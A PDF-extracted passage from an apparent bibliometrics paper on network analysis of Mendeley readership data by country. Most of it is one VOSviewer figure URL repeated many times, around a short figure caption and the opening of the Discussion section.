http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig5_map.txt&network=http://www.leydesdorff.net/mendeley/fig5_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://dx.doi.org/10.7717/peerj-cs.32 Figure 6 115 countries in the second group of nations. Figures 5 and 6 show the country groups 1 and 2. A version of Fig. 6 can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff. net/mendeley/fig6 map.txt&network=http://www.leydesdorff.net/mendeley/fig6 net. txt&n lines=10000&label size=1.0&label size variation=0.34. As in the case of Fig. 5, one can run mapping and clustering of the subsets in VOSviewer for obtaining more details. DISCUSSION Networks are one of the most important and popular methods to analyze bibliometric data. In this study, we explored whether Mendeley data can also be successfully used as a data source for network analysis. Only a few attempts have been made up to now to analyze the rich Mendeley data using network analyses techniques. It is a great advantage that the data can be retrieved for comprehensive publication sets using an API. Thus, one can download readership data on a large scale, which is very suitable for network analyses. We Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 11/15 https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 